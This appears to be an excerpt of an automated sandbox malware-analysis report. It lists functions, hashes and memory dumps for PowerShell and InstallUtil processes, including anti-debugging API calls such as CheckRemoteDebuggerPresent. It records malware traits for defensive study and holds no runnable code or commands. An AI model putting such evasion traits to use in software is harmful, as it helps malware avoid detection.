Instruction ID: 4c3848df6e5c8ca9ac414cee9c31bd2aec40f019911be405cbb781a4e50d899d
Opcode Fuzzy Hash: 5e27c7f58342c3514997d4c4e5a3a2d55397f42290e80590610f32ed0fa80722
Instruction Fuzzy Hash: 0E415A70A0C64C8FDB59DF98D895BADBBF0EB5A310F1041AED049E7252DA71A885CF41

Function 00007FFD9BA029E9 Relevance: 1.2, Instructions: 1155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1807535776.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9ba00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f7203ee9ede67417be185c7bb6be6ff466378d202cd17d402b00de51649f010
Instruction ID: 8b29b5a569a50da6877a65e81748552491e43fe8fcef934e4e239f57ec2a919a
Opcode Fuzzy Hash: 6f7203ee9ede67417be185c7bb6be6ff466378d202cd17d402b00de51649f010
Instruction Fuzzy Hash: 62913762B0EBC90FE7769BA858655743BD1EF93220F0901FFD489C71A3DA55AD068342

Function 00007FFD9BA01BB1 Relevance: .7, Instructions: 676
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1807535776.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9ba00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6da02d3d1430a231673bfe963665e63dc55e1ce0833c1832580eca7696fe221
Instruction ID: 9d98d3f2010f31731035cf11f0d3cb4ac3474ff34573eabb3940bf590c2a0ec9
Opcode Fuzzy Hash: c6da02d3d1430a231673bfe963665e63dc55e1ce0833c1832580eca7696fe221
Instruction Fuzzy Hash: A212E722B0EB8E0FE7A69BA858655B57BD1EF67210F0901FBE08DC71E3DA54AD05C341

Function 00007FFD9BA00948 Relevance: .4, Instructions: 366
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1807535776.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9ba00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c01ba6f670cac58e575a140f368955c60dd06b7e9b28d1284e337699bcf4f4bd
Instruction ID: 2197f4f6c679fea42e51b9341701d9e00503fc0f5ffa9090cf6983ad56a9bc41
Opcode Fuzzy Hash: c01ba6f670cac58e575a140f368955c60dd06b7e9b28d1284e337699bcf4f4bd
Instruction Fuzzy Hash: 2BB10022B0FA8E0FE7B6A7A808756B57BD1EF93614B1A00BAD09DC71E3DD489D058345

Function 00007FFD9BA02168 Relevance: .3, Instructions: 324
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1807535776.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9ba00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23bb6dd12c48700b3b3a16b4449365a0c6d32a574c20ac1dab6bae5833d96731
Instruction ID: 6d492e3656befc7e1e854d6ebcedde39a8652bd85f13650a2725d40dfc85a82c
Opcode Fuzzy Hash: 23bb6dd12c48700b3b3a16b4449365a0c6d32a574c20ac1dab6bae5833d96731
Instruction Fuzzy Hash: 84911522B0EB8E4FEBA697A858645647BE1EF67210F0901FBD089C71E7D9589D06C341

Function 00007FFD9BA00C79 Relevance: .3, Instructions: 292
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1807535776.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9ba00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 877f263f4aae60c6ff01a4c561027e015bfcef40b1cce904d5d2ffe95639d973
Instruction ID: 9d317a9247ad4f807cc4fbd83d24bb55bba96f1f9f94aee241001c9aaa7f1efd
Opcode Fuzzy Hash: 877f263f4aae60c6ff01a4c561027e015bfcef40b1cce904d5d2ffe95639d973
Instruction Fuzzy Hash: C2812522B0EA8D0FE7B6976818756B17BD1EFA7610F0A01FBD09DC31A3D954AD028355

Function 00007FFD9BA009EA Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1807535776.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9ba00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be4a14755b6cfb41e6ad0c3b84cf6bc14c64618ae36e722e6ea1582621dc6bcc
Instruction ID: b920d26e1eeb14e91555ce1bc67baa136e5805606a264f6f601ba23d7a11dab8
Opcode Fuzzy Hash: be4a14755b6cfb41e6ad0c3b84cf6bc14c64618ae36e722e6ea1582621dc6bcc
Instruction Fuzzy Hash: EA410552F0FA8F0FE7B597A8047527966C2EFA2615F5A00BAD49EC31F2DD48AD009305

Function 00007FFD9BA00D2A Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1807535776.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9ba00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be9dc0828ef7366402589a639fc479b31e0c0b0ec37a66b95c8d8f85219b3ee6
Instruction ID: 5c5283ec0a151962f8423dcdc816d9f12cf0358eab48e8de9e5a7df0d16aa18e
Opcode Fuzzy Hash: be9dc0828ef7366402589a639fc479b31e0c0b0ec37a66b95c8d8f85219b3ee6
Instruction Fuzzy Hash: D111A022F0EA1E4BFBB4969C14B52B512C2EFA5A11F060176E88DC31B6DE98BD004298

Function 00007FFD9BA01FB8 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1807535776.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9ba00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c9364d05aa7ba3afce84213a546ac0f192e6b448b5f449b8f460a0be7f0e43
Instruction ID: e69aa7f82ed5fc103412159a7f52e11d07b235e1685981857028e765eaca3c48
Opcode Fuzzy Hash: 37c9364d05aa7ba3afce84213a546ac0f192e6b448b5f449b8f460a0be7f0e43
Instruction Fuzzy Hash: 77F0F912F0FB1E1BFBB96B9C14716B850C2DFB6210F4A01BBE94EC31E6DD48AD049280

Analysis Process: InstallUtil.exePID: 7736, Parent PID: 7552COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.4%
Total number of Nodes:	125
Total number of Limit Nodes:	13

Executed Functions

Function 06823120 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06823848
$^q, xrefs: 0682381F
$^q, xrefs: 0682382B
$^q, xrefs: 06823878
$^q, xrefs: 0682386C
$^q, xrefs: 06823854

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 1e44ac990352f149c5f00804671034669512294bac4dff0f0f0adabd1ca0c6ff
Instruction ID: 3e6d7120031065b12d677d579cb48851dcf5d1a1cefe0c0dcb6027aba2dd9f62
Opcode Fuzzy Hash: 1e44ac990352f149c5f00804671034669512294bac4dff0f0f0adabd1ca0c6ff
Instruction Fuzzy Hash: 56322F31E1071ACFCB14EF75C89459DB7B6BFC9300F1096AAD549AB254EB30AAC5CB81

Function 06827E50 Relevance: 3.0, Strings: 2, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0682818D
$^q, xrefs: 06828199

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 2bf06e457d25d68e61c51f854f87ab4774d01eb9ee1926e47a27c326979562e9
Instruction ID: a2c6aeb7880ab1eeca59cf3b38f63cd3387a9bf861d9bbe0e3aef64fe3cbf5f4
Opcode Fuzzy Hash: 2bf06e457d25d68e61c51f854f87ab4774d01eb9ee1926e47a27c326979562e9
Instruction Fuzzy Hash: 02029E70B0021A8FDF54DB69D4906AEB7E2FF84304F148529D516DB394DB31EC86CB91

Function 0682C250 Relevance: 1.9, Strings: 1, Instructions: 647COMMON

Download Yara Rule

Strings

z, xrefs: 0682C89C

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: z
API String ID: 0-1657960367
Opcode ID: d16fa6e7a5d61d4cf7a8baaf677d97b027d42a9bf101fda0e90d86329132a7ea
Instruction ID: b51846b1983d72efa7873b41dfda98b82eca5843a8a0df389fcfb1f594410f80
Opcode Fuzzy Hash: d16fa6e7a5d61d4cf7a8baaf677d97b027d42a9bf101fda0e90d86329132a7ea
Instruction Fuzzy Hash: 5E328170A0021A8FDF94DB68D990BBDB7B2FB88310F108529E506EB355DB31DC86CB91

Function 06825258 Relevance: 1.8, Strings: 1, Instructions: 597COMMON

Download Yara Rule

Strings

$, xrefs: 068255A3

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: b11efd1eb83ac87606fefa2551e120a850e6fadf61095671e9345839ce233229
Instruction ID: 1a5b2e1a55ab2d328a1f5d6cd1c1a8733d41cc60949c7b8a849ac9b359434ee9
Opcode Fuzzy Hash: b11efd1eb83ac87606fefa2551e120a850e6fadf61095671e9345839ce233229
Instruction Fuzzy Hash: AB22C071E4022A9FDF60CBA4C5846AEB7F2FF89310F248569D545EB344DA31DC81CB92

Function 015D70B0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 015D7127

Memory Dump Source

Source File: 00000006.00000002.2946237463.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15d0000_InstallUtil.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: d15cb2788035341f84ed265662f5bc8af624ae7b9707930a3ff1309aa540d1ba
Instruction ID: 5efcf1135e64763d77f90bf7bdc37e26baca6b3c849205ca83f610c928d61183
Opcode Fuzzy Hash: d15cb2788035341f84ed265662f5bc8af624ae7b9707930a3ff1309aa540d1ba
Instruction Fuzzy Hash: DF2148B1800259CFCB10CF9AD844BEEFBF4EF48324F14842AE455A7250C738A944CFA1

Function 068266C0 Relevance: .8, Instructions: 822COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e7e104ba5873ea3aa4dfc58e432322d268a441bda64a6a498c742a9838a998d
Instruction ID: 8b3ab77a296411c3d68c596ab43dabc6bcec354b2c67d1adafa8848862c42c4f
Opcode Fuzzy Hash: 4e7e104ba5873ea3aa4dfc58e432322d268a441bda64a6a498c742a9838a998d
Instruction Fuzzy Hash: B262A034B0022A9FDB54DB68D554AADB7F2EF84314F248569D50AEB354EB31ECC2CB81

Function 0682B2F0 Relevance: .6, Instructions: 582COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc3d3c01721b3954fe0f6a1071ddce0bb8c63a5eb33280e3cb0dfe5574c6949a
Instruction ID: 5575dacdfeacfc9b33f9e1d98032e98126712c3d20103f19ecc8ccf80808905b
Opcode Fuzzy Hash: cc3d3c01721b3954fe0f6a1071ddce0bb8c63a5eb33280e3cb0dfe5574c6949a
Instruction Fuzzy Hash: 54229370E1221A8FDF64CBA8C5907ADB7F1EB85314F248926E609EB395DA34DCC1CB51

Function 015DDE90 Relevance: .6, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2946237463.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa08b70de6d15dceda709ddc4373f1c43a7f3082d9057a2b524feec1025bfc00
Instruction ID: 2b17af016bfae8d12b3ba11df9000fd2a217fa7691a34857fbba12d4107c2855
Opcode Fuzzy Hash: aa08b70de6d15dceda709ddc4373f1c43a7f3082d9057a2b524feec1025bfc00
Instruction Fuzzy Hash: 42120432B002168FDB25CB6CC8806BEBBB2FB84310F19856AD459DF296D735EC46C791

Function 015D41F0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2946237463.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5cd8dba1c34b017dfba51de0945057e811ad3614a1b452dc61233aee2a565b
Instruction ID: 723566be21479707c6fa298d0e2e73dbcc53e50eab851c285ccfe19dee3ee3a8
Opcode Fuzzy Hash: 7a5cd8dba1c34b017dfba51de0945057e811ad3614a1b452dc61233aee2a565b
Instruction Fuzzy Hash: 37B12F70E00209CFDF24CFADD9857ADBBF2BF88314F148529D815AB654EB749886CB81

Function 015D4AC0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2946237463.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ab7c390c7d1a70ca02dadb08c8f5292e773cc05b155e0a505810b03beddede6
Instruction ID: 11882a6e438d91156d790f92b7b66a301d0fe3cd9f288124edf3e6b6bb01c212
Opcode Fuzzy Hash: 6ab7c390c7d1a70ca02dadb08c8f5292e773cc05b155e0a505810b03beddede6
Instruction Fuzzy Hash: FFB13C70E002098FEF24DFADD89579DBBF2BF88314F148529D415EB694EB749845CB81

Function 015D3EA8 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2946237463.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb5105d819787a44842f3c223d9ba94f8287b85334c96dc41b550cebf8a7368e
Instruction ID: 8fd3e093c5ded486b4e5a5f636a2c83b63135f0c594a5f7f263a402606999692
Opcode Fuzzy Hash: cb5105d819787a44842f3c223d9ba94f8287b85334c96dc41b550cebf8a7368e
Instruction Fuzzy Hash: 25914E70E00249DFDF24CFADC98579EBBF2BF88314F148129E459AB654EB749845CB81

Function 0682AD98 Relevance: 10.4, Strings: 8, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0682AF70
$^q, xrefs: 0682AF0C
$^q, xrefs: 0682AF3B
$^q, xrefs: 0682AF18
$^q, xrefs: 0682AF47
$^q, xrefs: 0682AF64
$^q, xrefs: 0682AEB9
$^q, xrefs: 0682AEC5

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: f2d56e836298a77bb55d12bfc3ad31a9a28dcc7e33e2e39acc53bb36eaa6f494
Instruction ID: 3890134b063712ac3d4d8aa31508ea3d39201f6b05f2cdec0fd075a23dc4b6a1
Opcode Fuzzy Hash: f2d56e836298a77bb55d12bfc3ad31a9a28dcc7e33e2e39acc53bb36eaa6f494
Instruction Fuzzy Hash: 99E17C70E0031A8FCB69DF68D590AAEB7B2EF84304F108529D50AEB354DB75DC86CB81

Function 0682B718 Relevance: 8.0, Strings: 6, Instructions: 468COMMON

Download Yara Rule

Strings

$^q, xrefs: 0682BC75
$^q, xrefs: 0682BCDD
$^q, xrefs: 0682BCD1
$^q, xrefs: 0682BCA9
$^q, xrefs: 0682BC9D
$^q, xrefs: 0682BC69

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 48edaa9066bcd449c7ebc8e24a52719fda7e04508e4b16a31ef7e50ddc1f89cb
Instruction ID: 34b43d851f85d0dd4f809995b9e6d021a4d2d2b70eef6dcf76c3c2384beebe81
Opcode Fuzzy Hash: 48edaa9066bcd449c7ebc8e24a52719fda7e04508e4b16a31ef7e50ddc1f89cb
Instruction Fuzzy Hash: 23028F70E0222A8FDBA4DF68D5806ADB7B1FB84318F14852AD50AEB355DB30DCC5CB91

Function 06816ED0 Relevance: 6.1, APIs: 4, Instructions: 145
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06816F5E
GetCurrentThread.KERNEL32 ref: 06816F9B
GetCurrentProcess.KERNEL32 ref: 06816FD8
GetCurrentThreadId.KERNEL32 ref: 06817031

Memory Dump Source

Source File: 00000006.00000002.2959382299.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6810000_InstallUtil.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 7c782ffe3e8b878cc1c96fd9f434058b740a9d8251f69b03d792157a033548fe
Instruction ID: 9e160eb50549790f35e942a703716d167fc85a7808ebed06685b57f3109a0358
Opcode Fuzzy Hash: 7c782ffe3e8b878cc1c96fd9f434058b740a9d8251f69b03d792157a033548fe
Instruction Fuzzy Hash: 37518BB09013498FDB54CFA9C84879EBFF1EF48304F24C959D599AB2A0DB349888CF65

Function 06816EE0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06816F5E
GetCurrentThread.KERNEL32 ref: 06816F9B
GetCurrentProcess.KERNEL32 ref: 06816FD8
GetCurrentThreadId.KERNEL32 ref: 06817031

Memory Dump Source

Source File: 00000006.00000002.2959382299.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6810000_InstallUtil.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 97fe02026e2e82eca358d8526c0ccec130b166bab6def54d2ec103c815f36da3
Instruction ID: 593fb3003837e8d046f9483dbc9c90832b8ace0bb25cce7fa1d8b0d8faace430
Opcode Fuzzy Hash: 97fe02026e2e82eca358d8526c0ccec130b166bab6def54d2ec103c815f36da3
Instruction Fuzzy Hash: 235157B09003098FDB54DFAAC948B9EBBF5EF48304F20C459E559A73A0D7749888CF65

Function 06829218 Relevance: 5.2, Strings: 4, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 068292C3
$^q, xrefs: 06829294
$^q, xrefs: 06829288
$^q, xrefs: 068292CF

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 2e881f9f8eae2c7675b254d72b5b0e8db1860c4a45a112419b3d835c78613ea6
Instruction ID: 2319b3aa2abe946efcd7c16dea60e487ebc1b4f21d3b561c1b2a5b7f4377667e
Opcode Fuzzy Hash: 2e881f9f8eae2c7675b254d72b5b0e8db1860c4a45a112419b3d835c78613ea6
Instruction Fuzzy Hash: C1914F70B0021A9FDF54DB65D9607AEB3F6EBC9604F108569C50AEB348EB70DC86CB91

Function 0682D018 Relevance: 4.6, Strings: 3, Instructions: 802
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0682D41F
$^q, xrefs: 0682D40B
$^q, xrefs: 0682D413

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: f9d201211315e5f0c25f1ce76723d47ee6e8d028f8fec8224db8063f06ec4e79
Instruction ID: 17782ca1978859a9e81a9355e2b660f177f26fbab2ba80a5572bc10048eb4575
Opcode Fuzzy Hash: f9d201211315e5f0c25f1ce76723d47ee6e8d028f8fec8224db8063f06ec4e79
Instruction Fuzzy Hash: 26623130A0021A8FCB55EF69D590A5DB7B2FF84304F248A69D445DF369DB71ED8ACB80

Function 06824820 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 0682494D
\Ocq, xrefs: 068249D7
fcq, xrefs: 06824F2D

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 7f4ba357fae1478a6bdadec2eb9743c841391671beec7c5e343a164359d3f570
Instruction ID: e51714dc8b2428497dc487b1ffd883c0264109d9af6ac25305e697e28cf34123
Opcode Fuzzy Hash: 7f4ba357fae1478a6bdadec2eb9743c841391671beec7c5e343a164359d3f570
Instruction Fuzzy Hash: A1617270F002199FDB549FA5C8547AEBAF6FB88700F20852ED20AEB394DB754D45CB91

Function 06829208 Relevance: 2.7, Strings: 2, Instructions: 176
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 068292C3
$^q, xrefs: 06829288

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 8a0130a0213f6b7856e1e3499b8a0325dd75f2d05321df7ca09c5f4c6bb9dc51
Instruction ID: 4340471ca549644ecdd16fd1693be6c9ecdfe2980d71e89fcb3d9f60f3e29de6
Opcode Fuzzy Hash: 8a0130a0213f6b7856e1e3499b8a0325dd75f2d05321df7ca09c5f4c6bb9dc51
Instruction Fuzzy Hash: 49518570B0021A9FDF54DB65D960BAEB7F6EBC8644F108569C50ADB398EB30DC42CB91

Function 0681F2F8 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0681F55E

Memory Dump Source

Source File: 00000006.00000002.2959382299.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6810000_InstallUtil.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d0945eb2031e7db2b6fda023d9c61a986e13c3d06c89d40bd72302b920e7c608
Instruction ID: 7fafa39851f02455723587f7b2d34f0a8fa3b018a724bcb1fb02ccd090127fa7
Opcode Fuzzy Hash: d0945eb2031e7db2b6fda023d9c61a986e13c3d06c89d40bd72302b920e7c608
Instruction Fuzzy Hash: 02815470A00B058FD764CF2AC45479ABBF5FF88300F108A2ED68ADBA50D771E945CB91

Function 015DF2A8 Relevance: 1.6, APIs: 1, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2946237463.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2972468b443495a092a92a4740826db240a2239dcf70096668e43eb3ce267fd0
Instruction ID: bb9b3f65ffea2e0b7b9162b061dd003915311452605657f9bb676ee1759a23ae
Opcode Fuzzy Hash: 2972468b443495a092a92a4740826db240a2239dcf70096668e43eb3ce267fd0
Instruction Fuzzy Hash: DD417772D043958FC710CFBDD80029EBFF1AF89210F1985ABD545EB251DB349845CBA1

Function 015D70A8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 015D7127

Memory Dump Source

Source File: 00000006.00000002.2946237463.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15d0000_InstallUtil.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: eb20dacaea18e5615160efee99c2793526f71a56b275c1d52ed730e1637f480b
Instruction ID: 957b58b9a1ec60e8c00e68f3fa2f5ff35d7aef95858bfa93d88ad5f63226b13e
Opcode Fuzzy Hash: eb20dacaea18e5615160efee99c2793526f71a56b275c1d52ed730e1637f480b
Instruction Fuzzy Hash: 2F2125B1801259CFCB10CFAAD884BEEBBF4AF48324F24846AE459A7250C3789945CF60

Function 06817120 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 068171AF

Memory Dump Source

Source File: 00000006.00000002.2959382299.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6810000_InstallUtil.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bdee8923177debe77a8ccbf2e516aa36d8f285e0c25fe7779c02edbf0db68a65
Instruction ID: 444e0cf56357defbdfcab232b0c02118195b9ebb6cfd771a18b1383a3aaeadbf
Opcode Fuzzy Hash: bdee8923177debe77a8ccbf2e516aa36d8f285e0c25fe7779c02edbf0db68a65
Instruction Fuzzy Hash: EF2105B59002499FDB10CFAAD884ADEBFF8EB48310F24841AE958A7350D374A940CFA1

Function 06817128 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 068171AF

Memory Dump Source

Source File: 00000006.00000002.2959382299.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6810000_InstallUtil.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
